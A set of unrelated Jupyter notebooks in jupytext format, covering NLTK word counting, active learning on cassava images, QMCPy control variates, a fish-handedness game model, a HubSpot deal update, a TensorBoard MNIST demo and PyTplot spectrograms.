# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Counting words
#
# ## Frequency
# The frequency of a word in a text, or its unusual length, can tell a lot about the text.
#
# In this Jupyter notebook, I discuss some counting techniques.
#Importing libs
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import nltk
#Calling the texts
from nltk.book import *
# # Counting words
#Counting the number of words in Genesis
len(text3)
#Printing the set of distinct words of Genesis
print(set(text3))
#Sorting the words in alphabetical order
print(sorted(set(text3)))
#print the number of distinct words of Genesis
len(set(text3))
# We can calculate how many times, on average, a word is used in the text.
len(text3)/len(set(text3)) #total number of words of the text divided by total number of distinct words of the text
# On average, a word of that text is used about 16 times.
# Perhaps our interest is in knowing what percentage of the text a given word represents.
#Counting word God
text3.count('God')
#Counting word Abraham
text3.count('Abraham')
#Calculating the percentage of the presence of the word God in the text
round((text3.count('God')/len(text3)) * 100, 2)
#Calculating the percentage of the presence of the word Abraham in the text
round((text3.count('Abraham')/len(text3)) * 100, 2)
# As you can see, the word God appears more often than the word Abraham. However, each accounts for less than 1% of the text.
# ### Defining a function to calculate lexical diversity on average and percentage of a word in a text
# An interesting observation concerns the lexical diversity of a text, which indicates how rich the text is lexically. We can have a long text with a poor vocabulary, or a short text with a rich one.
#
# Below I define two functions to measure that richness. The first measures how many times, on average, a word appears in the text. The second measures how diversified the text is, as a percentage: the closer to 100%, the richer the text is lexically.
#Defining lexical diversity function
def lexical_diversity(text):
    print('On average, a word appears {} times in the text.'.format(round(len(text)/len(set(text)), 2)))
#It prints the average number of uses per distinct word
#Defining percentage of lexical diversity function
def lexical_diversity_rate(text):
    print('The lexical diversity is {}%.'.format(round((len(set(text))/len(text))*100, 2)))
#Testing lexical diversity function
lexical_diversity(text3)
#Testing lexical diversity rate function
lexical_diversity_rate(text3)
# To decide whether a text has low or high lexical diversity, it is not enough to look at the rate alone; it is necessary to study other texts of the same class in order to understand the patterns of that text type.
# You can seek the presence rate of a word in a text through the function below.
#Building word presence rate function in the text
def word_presence_rate_in_the_text(text, word):
    print('The presence rate of this word is about {}%.'.format(round((text.count(word)/len(text))*100, 4)))
#Testing word presence rate function
word_presence_rate_in_the_text(text3, 'God')
#Testing the function on list
test_list = ['Hello', '!', 'My', 'names', 'is', 'Bruno', '.']
lexical_diversity(test_list) #Applying lexical diversity function
lexical_diversity_rate(test_list) #Applying lexical diversity rate function
word_presence_rate_in_the_text(test_list, 'names') #Word presence rate function
len(test_list) #Seeking for total number of words in the list
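# The functions above print their results, which makes them awkward to reuse in other code. A small sketch of value-returning variants (my own naming, not part of NLTK):

```python
def lexical_diversity_value(text):
    """Average number of occurrences per distinct word."""
    return len(text) / len(set(text))

def lexical_diversity_rate_value(text):
    """Distinct words as a percentage of all words (100% = no word repeats)."""
    return len(set(text)) / len(text) * 100

sample = ['the', 'dog', 'saw', 'the', 'cat', 'and', 'the', 'cat', 'ran']
print(lexical_diversity_value(sample))       # 9 tokens / 6 distinct words = 1.5
print(lexical_diversity_rate_value(sample))  # 6/9 as a percentage
```

# Returning values instead of printing lets the same measures be compared across texts programmatically.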
# # Picking up what makes a text distinct
# ## Frequency distribution
# The methods below work on the words frequencies.
#
# FreqDist( ) creates a dictionary-like object where the words are the keys and their frequencies in the text are the values.
#Computing the frequency distribution of the book of Genesis
most_freq_words3 = FreqDist(text3)
most_freq_words3
# To access the values/frequencies, just use the values( ) method.
#Showing the frequency of each word
most_freq_words3.values()
# keys( ) shows the keys/words.
#Printing the keys
keys_of_most_freq_words3 = most_freq_words3.keys()
keys_of_most_freq_words3
# Both keys( ) and values( ) work with FreqDist( ).
# There are very informative words that appear only once in a text. Those words are called hapaxes. Below are the ones that occur in the book of Genesis. Note that "Night" appears only once: it is probably because "Night" is spelled with a capital "N", so it is counted separately from "night".
#Printing words that appear only once
print(most_freq_words3.hapaxes())
#Printing the number of hapaxes
len(most_freq_words3.hapaxes())
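# FreqDist behaves much like Python's built-in collections.Counter, so the same counting ideas can be sketched without NLTK (the word list below is just a made-up example):

```python
from collections import Counter

words = ['in', 'the', 'beginning', 'the', 'light', 'and', 'the', 'darkness', 'and', 'light']
freq = Counter(words)
print(freq.most_common(2))                       # the most frequent words with their counts
hapaxes = [w for w, n in freq.items() if n == 1] # words that appear exactly once
print(hapaxes)
```

# FreqDist adds corpus-oriented conveniences on top of this (hapaxes(), plot(), and so on), but the underlying word-to-count mapping is the same.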
# # Fine-grained selection of words
# Another good possibility is to infer the main content of the text from its long words. Long words tend to be rarer and can convey important information about the content of a text.
#
# For that, observe this mathematical notation:
#
# P: words that have more than 9 characters;
#
# P(w) is true if and only if w is more than 9 characters long;
#
# V: vocabulary;
#
# a. {w | w ∈ V & P(w)}
#
# b. [w for w in V if P(w)]
# Applying that mathematical notation, the words below are returned.
#Operating the notation
V = set(text3) #Storing distinct words of the book of Genesis
expected_long_words = [w for w in V if len(w) > 9] #Storing words that have more than 9 characters
print(sorted(expected_long_words)) #Sorting the derived list
# Those words characterize parts of the book of Genesis. Note some of them:
#
# circumcised, commanding, commandment, commandments, concubines, generation, generations, habitations, imagination, inhabitants, interpretation, interpretations, interpreted, interpreter and pilgrimage.
#
# They are words with a degree of relationship to one another.
#Number of words derived from original text
len((sorted(expected_long_words)))
# According to the output above, the number of long words that meet the criterion is 139.
# Looking for long words is not always enough. Adding frequency to that criterion can be a good method of categorizing a text.
freqdist = FreqDist(text3) #Defining a dictionary where the words are keys and the values are their frequencies
print(sorted([w for w in V if len(w) > 4 and freqdist[w] > 16]))
#Keeping w if and only if it has more than 4 characters and its frequency is more than 16
# That instruction returns many names of people, nations and ethnicities, some foods and drinks, and time expressions.
02_NLTK-counting_words.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/ravindrabharathi/fsdl-active-learning2/blob/main/notebooks/test_active_learning_Cassava_least_confidence_no_dropout.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + colab={"base_uri": "https://localhost:8080/"} id="DoWvbjJa3e53" outputId="dcb6f0aa-5cbc-4f5a-cd68-f97a5e05c4b9"
# !git clone --single-branch --branch cassava-deepweeds https://github.com/ravindrabharathi/fsdl-active-learning2.git
# + colab={"base_uri": "https://localhost:8080/"} id="PVuDwtl8t_Ew" outputId="e20dcd78-8c89-4737-b5f0-27fbe27777c9"
# %cd fsdl-active-learning2
# + colab={"base_uri": "https://localhost:8080/"} id="CZ4k36MGtb-K" outputId="cfbf0d60-adc0-4519-8b73-2fbea8e79380"
from google.colab import drive
drive.mount('/gdrive')
# + id="vJTqhmEStdHd"
# !mkdir './data/cassava/'
# + id="5BRIry8pt4Gb"
# !cp '/gdrive/MyDrive/cassava-kaggle/train_images.zip' './data/cassava/'
# !cp '/gdrive/MyDrive/cassava-kaggle/train.csv' './data/cassava/'
# + id="f0Lj5k0Kkjs9"
# !unzip -q './data/cassava/train_images.zip' -d './data/cassava/images'
# + id="ds7QXOu5imsW"
# alternative way: if you cloned the repository to your GDrive account, you can mount it here
#from google.colab import drive
#drive.mount('/content/drive', force_remount=True)
# #%cd /content/drive/MyDrive/fsdl-active-learning
# + colab={"base_uri": "https://localhost:8080/"} id="1bX8zIz-i2pJ" outputId="0f26ee8e-5e3d-4461-b301-d2bd7a6e8d44"
# !pip3 install PyYAML==5.3.1
# !pip3 install boltons wandb pytorch_lightning==1.2.8
# !pip3 install torch==1.7.1+cu110 torchvision==0.8.2+cu110 torchaudio==0.7.2 torchtext==0.8.1 -f https://download.pytorch.org/whl/torch_stable.html # general lab / pytorch installs
# !pip3 install modAL tensorflow # active learning project
# !pip install hdbscan
# %env PYTHONPATH=.:$PYTHONPATH
# + id="mw7Tcp8Qiw9h" colab={"base_uri": "https://localhost:8080/"} outputId="b90dfdf0-2a9b-43f7-ab1a-8548ec39794b"
# #!python training/run_experiment.py --wandb --gpus=1 --max_epochs=1 --num_workers=4 --data_class=DroughtWatch --model_class=ResnetClassifier --batch_size=32 --sampling_method="random"
# !python training/run_experiment.py --gpus=1 --max_epochs=10 --num_workers=4 --data_class=CassavaDataModule --model_class=ResnetClassifier2 --sampling_method="least_confidence" --batch_size=256
notebooks/test_active_learning_Cassava_least_confidence_no_dropout.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="wyIC-fSKUcL7"
# # Control Variates in QMCPy
#
# This notebook demonstrates QMCPy's current support for control variates.
# + [markdown] id="v_CDThSJUpUz"
# ## Setup
# + id="vxpOFASNPuHw"
from qmcpy import *
from numpy import *
# + id="cf7vhLKZgK6Z"
from matplotlib import pyplot
# %matplotlib inline
size = 20
pyplot.rc('font', size=size) # controls default text sizes
pyplot.rc('axes', titlesize=size) # fontsize of the axes title
pyplot.rc('axes', labelsize=size) # fontsize of the x and y labels
pyplot.rc('xtick', labelsize=size) # fontsize of the tick labels
pyplot.rc('ytick', labelsize=size) # fontsize of the tick labels
pyplot.rc('legend', fontsize=size) # legend fontsize
pyplot.rc('figure', titlesize=size) # fontsize of the figure title
# + id="gP5vClqmCuE4"
def compare(problem,discrete_distrib,stopping_crit,abs_tol):
    g1,cvs,cvmus = problem(discrete_distrib)
    sc1 = stopping_crit(g1,abs_tol=abs_tol)
    name = type(sc1).__name__
    print('Stopping Criterion: %-15s absolute tolerance: %-5.1e'%(name,abs_tol))
    sol,data = sc1.integrate()
    print('\tWO CV: Solution %-10.2f time %-10.2f samples %.1e'%(sol,data.time_integrate,data.n_total))
    sc1 = stopping_crit(g1,abs_tol=abs_tol,control_variates=cvs,control_variate_means=cvmus)
    solcv,datacv = sc1.integrate()
    print('\tW CV:  Solution %-10.2f time %-10.2f samples %.1e'%(solcv,datacv.time_integrate,datacv.n_total))
    print('\tControl variates took %.1f%% the time and %.1f%% the samples\n'%\
        (100*datacv.time_integrate/data.time_integrate,100*datacv.n_total/data.n_total))
# + [markdown] id="x-wXHvDxvHAI"
# ## Problem 1: Polynomial Function
#
# We will integrate
# $$g(t) = 10t_1-5t_2^2+2t_3^3$$
# with true measure $\mathcal{U}[0,2]^3$ and control variates
# $$\hat{g}_1(t) = t_1$$
# and
# $$\hat{g}_2(t) = t_2^2$$
# using the same true measure.
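# Before running the QMCPy version, the control-variate idea itself can be sketched with plain NumPy (a crude IID Monte Carlo estimator, not QMCPy's machinery): regress g on the centered control variates, subtract the fitted part, and add back the known means.

```python
import numpy as np

rng = np.random.default_rng(7)
n = 100_000
t = rng.uniform(0, 2, size=(n, 3))                  # samples from U[0,2]^3

g = 10*t[:, 0] - 5*t[:, 1]**2 + 2*t[:, 2]**3        # integrand
cvs = np.column_stack([t[:, 0], t[:, 1]**2])        # control variates g1_hat, g2_hat
cv_means = np.array([1.0, 4/3])                     # their exact means under U[0,2]

# plain Monte Carlo estimate
plain = g.mean()

# least-squares coefficients of g on the centered control variates
beta, *_ = np.linalg.lstsq(cvs - cv_means, g - g.mean(), rcond=None)
adjusted = g - (cvs - cv_means) @ beta              # same mean, smaller variance
cv_est = adjusted.mean()

true_value = 22/3   # 10*E[t1] - 5*E[t2^2] + 2*E[t3^3] = 10 - 20/3 + 4
print(plain, cv_est, adjusted.std() / g.std())
```

# Because the control variates absorb the linear contributions of t1 and t2^2, the adjusted samples have a markedly smaller standard deviation, which is why the QMCPy runs below need fewer samples to reach the same tolerance.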
# + colab={"base_uri": "https://localhost:8080/"} id="Z6iwKN8dvHVS" outputId="7264eefb-20ed-4e23-cb87-e996d89fd843"
# parameters
def poly_problem(discrete_distrib):
    g1 = CustomFun(Uniform(discrete_distrib,0,2),lambda t: 10*t[:,0]-5*t[:,1]**2+2*t[:,2]**3)
    cv1 = CustomFun(Uniform(discrete_distrib,0,2),lambda t: t[:,0])
    cv2 = CustomFun(Uniform(discrete_distrib,0,2),lambda t: t[:,1]**2)
    return g1,[cv1,cv2],[1,4/3]
compare(poly_problem,IIDStdUniform(3,seed=7),CubMCCLT,abs_tol=1e-2)
compare(poly_problem,Sobol(3,seed=7),CubQMCSobolG,abs_tol=1e-8)
# + [markdown] id="YCC364nrUxcY"
# ## Problem 2: Keister Function
#
# This problem will integrate the Keister function while using control variates
# $$g_1(x) = \sin(\pi x)$$
# and
# $$g_2(x) = -3(x-1/2)^2+1.$$
# The following code does this problem in 1 dimension for visualization purposes, but control variates are compatible with any dimension.
# + colab={"base_uri": "https://localhost:8080/"} id="c0oAxLqrFWHk" outputId="5f007bde-14cc-41ff-a880-990dc7e97ecf"
def keister_problem(discrete_distrib):
    k = Keister(discrete_distrib)
    cv1 = CustomFun(Uniform(discrete_distrib),lambda x: sin(pi*x).sum(1))
    cv2 = CustomFun(Uniform(discrete_distrib),lambda x: (-3*(x-.5)**2+1).sum(1))
    return k,[cv1,cv2],[2/pi,3/4]
compare(keister_problem,IIDStdUniform(1,seed=7),CubMCCLT,abs_tol=5e-4)
compare(keister_problem,IIDStdUniform(1,seed=7),CubMCCLT,abs_tol=4e-4)
compare(keister_problem,Sobol(1,seed=7),CubQMCSobolG,abs_tol=1e-7)
# + [markdown] id="8j9OEXmmWSPe"
# ## Problem 3: Option Pricing
#
# We will use a European call option as a control variate for pricing an Asian call option with various stopping criteria, as done for Problem 1.
# + colab={"base_uri": "https://localhost:8080/"} id="vSojYYnMGEQY" outputId="f3d8a4d0-bb7f-4a95-ff3e-6bb64c8c9b49"
call_put = 'call'
start_price = 100
strike_price = 125
volatility = .75
interest_rate = .01 # 1% interest
t_final = 1 # 1 year
def option_problem(discrete_distrib):
    eurocv = EuropeanOption(discrete_distrib,volatility,start_price,strike_price,interest_rate,t_final,call_put)
    aco = AsianOption(discrete_distrib,volatility,start_price,strike_price,interest_rate,t_final,call_put)
    mu_eurocv = eurocv.get_exact_value()
    return aco,[eurocv],[mu_eurocv]
compare(option_problem,IIDStdUniform(4,seed=7),CubMCCLT,abs_tol=5e-2)
compare(option_problem,Sobol(4,seed=7),CubQMCSobolG,abs_tol=1e-3)
demos/control_variates.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # The Handedness of Fish
# ## Abstract
# ### As surveys of Lake Tanganyika have shown, fish are known to have a handedness (a preferred mouth orientation). This experiment uses an evolutionary game on a spatial structure to track how the handedness bias of a population evolves.
# ## Model
# Assume there are two kinds of fish: piscivorous (fish-eating) fish and prey fish, and that piscivorous fish do not prey on each other. A prey fish pays attention to right-handed attackers with probability P = (number of right-handed fish)/(total population), and to left-handed attackers with probability 1-P. Therefore, whenever one handedness is in the majority, an individual can improve its payoff by choosing the minority handedness. One would thus expect the population to end up fluctuating around a 50/50 split; however, the Lake Tanganyika surveys show the population alternating between periods of right-handed and left-handed excess. Why is that? This experiment explains the mechanism by considering a game on a graph, focusing on the transmission of "information".
#
# +
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def func(x, t, a, b, c, d):
    return [x[0]*(1-x[0])*((a*(1-x[1])-b-c+d*(1-x[1]))*x[0]+b-d), x[1]*(1-x[1])*((a-b-c+d)*x[1]+b-d)]
a = 0.0
b = 0.2
c = -0.2
d = 0.0
x0 = [0.1, 0.1]
t = np.arange(0, 100, 0.01)
x = odeint(func, x0, t, args=(a, b, c, d))
plt.plot(x)
# +
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def func(v, t, p, r, b):
    # Lorenz equations: dx/dt = p(y-x), dy/dt = x(r-z)-y, dz/dt = xy-bz
    return [-p*v[0]+p*v[1], -v[0]*v[2]+r*v[0]-v[1], v[0]*v[1]-b*v[2]]
p = 10
r = 28
b = 8/3
v0 = [0.1, 0.1, 0.1]
t = np.arange(0, 100, 0.01)
v = odeint(func, v0, t, args=(p, r, b))
fig = plt.figure()
ax = fig.add_subplot(projection='3d')
ax.plot(v[:, 0], v[:, 1], v[:, 2])
# plt.show()
# -
handedness_of_fish.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# <img width="10%" alt="Naas" src="https://landen.imgix.net/jtci2pxwjczr/assets/5ice39g4.png?w=160"/>
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# # HubSpot - Update deal
# <a href="https://app.naas.ai/user-redirect/naas/downloader?url=https://raw.githubusercontent.com/jupyter-naas/awesome-notebooks/master/HubSpot/HubSpot_Update_deal.ipynb" target="_parent"><img src="https://naasai-public.s3.eu-west-3.amazonaws.com/open_in_naas.svg"/></a>
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# **Tags:** #hubspot #crm #sales #deal #naas_drivers #snippet
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# **Author:** [<NAME>](https://www.linkedin.com/in/florent-ravenel/)
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ## Input
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### Import library
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
from naas_drivers import hubspot
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### Setup your HubSpot
# 👉 Access your [HubSpot API key](https://knowledge.hubspot.com/integrations/how-do-i-get-my-hubspot-api-key)
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
HS_API_KEY = 'YOUR_HUBSPOT_API_KEY'
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### Enter deal parameters to update
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
deal_id = "3501002068"
dealname = "TEST"
dealstage = '5102584'
closedate = '2021-12-31' #date format must be %Y-%m-%d
amount = '100.50'
hubspot_owner_id = None
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ## Model
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### With patch method
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
update_deal = {"properties":
{
"dealstage": dealstage,
"dealname": dealname,
"amount": amount,
"closedate": closedate,
"hubspot_owner_id": hubspot_owner_id,
}
}
deal1 = hubspot.connect(HS_API_KEY).deals.patch(deal_id,
update_deal)
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### With update method
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
deal2 = hubspot.connect(HS_API_KEY).deals.update(
deal_id,
dealname,
dealstage,
closedate,
amount,
hubspot_owner_id
)
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ## Output
# + [markdown] papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
# ### Display results
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
deal1
# + papermill={} tags=["awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb", "awesome-notebooks/HubSpot/HubSpot_Update_deal.ipynb"]
deal2
HubSpot/HubSpot_Update_deal.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Credits
# Code adapted from: https://github.com/decentralion/tf-dev-summit-tensorboard-tutorial/blob/master/mnist.py
# # Tf.summary
# The tf.summary module contains TensorFlow operators that output data in the "summary" protocol buffer format.
# Examples:
# tf.summary.scalar
# tf.summary.image
# tf.summary.audio
# +
import os
import os.path
import shutil
import tensorflow as tf
LOGDIR = "./mnist_demo/"
### MNIST EMBEDDINGS ###
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets(train_dir=LOGDIR + "data", one_hot=True)
# -
LABELS = os.path.join(os.getcwd(), "labels_1024.tsv")
SPRITES = os.path.join(os.getcwd(), "sprite_1024.png")
# +
def conv_layer(input, size_in, size_out, name='conv'):
    with tf.name_scope(name):
        #w = tf.Variable(tf.zeros([5, 5, size_in, size_out]), name='W')
        w = tf.Variable(tf.truncated_normal([5, 5, size_in, size_out], stddev=0.1), name="W")
        #b = tf.Variable(tf.zeros([size_out]), name='B')
        b = tf.Variable(tf.constant(0.1, shape=[size_out]), name="B")
        conv = tf.nn.conv2d(input, w, strides=[1, 1, 1, 1], padding="SAME")
        act = tf.nn.relu(conv + b)
        tf.summary.histogram("weights", w)
        tf.summary.histogram("biases", b)
        tf.summary.histogram("activations", act)
        return tf.nn.max_pool(act, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME")
def fc_layer(input, size_in, size_out, name='fc'):
    with tf.name_scope(name):
        # w = tf.Variable(tf.zeros([size_in, size_out]), name='W')
        w = tf.Variable(tf.truncated_normal([size_in, size_out], stddev=0.1), name="W")
        # b = tf.Variable(tf.zeros([size_out]), name='B')
        b = tf.Variable(tf.constant(0.1, shape=[size_out]), name="B")
        act = tf.matmul(input, w) + b
        tf.summary.histogram("weights", w)
        tf.summary.histogram("biases", b)
        tf.summary.histogram("activations", act)
        return act
# -
def mnist_model(learning_rate):
    tf.reset_default_graph()
    sess = tf.Session()
    # Setup placeholders, and reshape the data
    x = tf.placeholder(tf.float32, shape=[None, 784], name="x")
    y = tf.placeholder(tf.float32, shape=[None, 10], name="labels")
    x_image = tf.reshape(x, [-1, 28, 28, 1])
    tf.summary.image('input', x_image, 3)
    # create the network
    # first conv layer
    conv1 = conv_layer(x_image, 1, 32, "conv1")
    # second conv layer
    conv_out = conv_layer(conv1, 32, 64, "conv2")
    flattened = tf.reshape(conv_out, [-1, 7 * 7 * 64])
    #################
    embedding_input = flattened
    #################
    # embedding_size = 7 * 7 * 64
    fc1 = fc_layer(flattened, 7 * 7 * 64, 1024, 'fc1')
    logits = fc_layer(fc1, 1024, 10, 'fc2')
    # compute cross entropy as our loss function
    with tf.name_scope("xent"):
        xent = tf.reduce_mean(
            tf.nn.softmax_cross_entropy_with_logits_v2(
                logits=logits, labels=y))
        tf.summary.scalar("xent", xent)
    # use an AdamOptimizer to train the network
    with tf.name_scope("train"):
        train_step = tf.train.AdamOptimizer(learning_rate).minimize(xent)
    # compute the accuracy
    with tf.name_scope("accuracy"):
        correct_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(y, 1))
        accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
        tf.summary.scalar("accuracy", accuracy)
    # Initialize all the variables
    sess.run(tf.global_variables_initializer())
    merged_summary = tf.summary.merge_all()
    writer = tf.summary.FileWriter(LOGDIR + "5-embedding-visualizer")
    writer.add_graph(sess.graph)
    #############
    embedding = tf.Variable(tf.zeros([1024, 7*7*64]), name="test_embedding")
    assignment = embedding.assign(embedding_input)
    saver = tf.train.Saver()
    config = tf.contrib.tensorboard.plugins.projector.ProjectorConfig()
    embedding_config = config.embeddings.add()
    embedding_config.tensor_name = embedding.name
    embedding_config.sprite.image_path = SPRITES
    embedding_config.metadata_path = LABELS
    # Specify the width and height of a single thumbnail.
    embedding_config.sprite.single_image_dim.extend([28, 28])
    tf.contrib.tensorboard.plugins.projector.visualize_embeddings(writer, config)
    # Train for 1000 steps
    for i in range(1000):
        batch = mnist.train.next_batch(100)
        # Occasionally report accuracy
        if i % 50 == 0:
            [train_accuracy, s] = sess.run([accuracy, merged_summary], feed_dict={x: batch[0], y: batch[1]})
            writer.add_summary(s, i)
            print("step %d, training accuracy %g" % (i, train_accuracy))
            ###############
            # Occasionally calculate the embedding for the test dataset
            sess.run(assignment, feed_dict={x: mnist.test.images[:1024], y: mnist.test.labels[:1024]})
            saver.save(sess, os.path.join(LOGDIR, "model.ckpt"), i)
        # Run the training step
        sess.run(train_step, feed_dict={x: batch[0], y: batch[1]})
mnist_model(1e-4)
#
# ## Let's visualize the TensorFlow graph
# tensorboard --logdir ./mnist_demo/5-embedding-visualizer
notebook/TFAML_L5_Tensorboard_demo/mnist_v5 - embedding visualizer.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="_PzHTGSIYdZS"
# # PyTplot spectrogram options
#
# This notebook shows how to create and work with spectrograms in PyTplot
#
# Originally created at the 2022 PyHC Spring Meeting Hackathon
# + id="eJ6cGCpw-IaE"
# !pip install https://github.com/MAVENSDC/PyTplot/archive/matplotlib-backend.zip
# + id="aA2EZwEn-QS8"
import numpy as np
# + id="A63NgE4S-tr0"
from pytplot import store_data, options, tplot
# + [markdown] id="KZTsloPhVvUo"
# Create a simple spectrogram variable
# + id="ACbSfMIH-vd4"
data = np.array([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9],
[10, 11, 12, 13, 14],
[15, 16, 17, 18, 19],
[20, 21, 22, 23, 24]])
# + [markdown] id="VHNcrjDtV0t4"
# Note: spectrogram variables should have the `v` option set in the data dictionary, with the y-axis values for the spectra
# + colab={"base_uri": "https://localhost:8080/"} id="-amcqj8O-whi" outputId="ee7012a0-1bb8-4151-ddc8-943f51bbfc90"
store_data('data', data={'x': [1, 2, 3, 4, 5], 'y': data.transpose(), 'v': [10, 20, 30, 40, 50]})
# + [markdown] id="Vi6VkXRMWBMy"
# By default, it'll still show up as a line plot
# + colab={"base_uri": "https://localhost:8080/", "height": 608} id="sItBNG57-12B" outputId="babefd51-04b2-4c22-a7c6-9ae97a039c14"
tplot('data')
# + [markdown] id="BK0sIygTWEgw"
# Set the `spec` option to turn it into a spectrogram
# + id="Fuodk5kK-23u"
options('data', 'spec', True)
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="fx0rklDm-6Ek" outputId="7b9af8cc-3778-442a-aa54-38181b7a88b1"
tplot('data')
# + [markdown] id="ew4qLvs1WHqL"
# Update the y-axis range
# + id="Q_IG-dUp-6o3"
options('data', 'yrange', [15, 45])
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="WCWbPlXO_Ho5" outputId="4d39a8cf-ca1f-41fb-a4a2-a335f08d3663"
tplot('data')
# + [markdown] id="oVt9sf3IWLIT"
# Change the y-axis range back
# + id="AuoyVz4c_IG5"
options('data', 'yrange', [10, 50])
# + [markdown] id="7bXLBUUdWMz_"
# Update the color bar range
# + id="QHlw8rPo_MG-"
options('data', 'zrange', [5, 20])
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="rC82yrf3_Qfj" outputId="535bd5a2-66b4-49db-8865-08b6d8602b42"
tplot('data')
# + [markdown] id="-13PCYCKWPZD"
# Change the color bar range back
# + id="1azX4_9Y_Q-U"
options('data', 'zrange', [0, 24])
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="aHKnuyPm_WwG" outputId="cee0b025-cb0f-42c0-c26a-9bf8780c6d2a"
tplot('data')
# + [markdown] id="GkqUYw0eWR0C"
# Change the color bar
#
# Note: this should support all of the colormaps available in matplotlib, see:
#
# https://matplotlib.org/3.5.0/tutorials/colors/colormaps.html
#
# for a list
# + id="grPtekb0_XMz"
options('data', 'Colormap', 'plasma')
# + colab={"base_uri": "https://localhost:8080/", "height": 613} id="g54kZw_U_gwU" outputId="04d8a50f-b21a-467a-b028-8457e256de5b"
tplot('data')
# + [markdown] id="iNYQ4iBUWewa"
# In addition to the matplotlib colormaps, we also support the `spedas` color bar (the same one as in IDL SPEDAS). The `spedas` colormap is the default
# + id="5LcDRo7y_hPW"
options('data', 'Colormap', 'spedas')
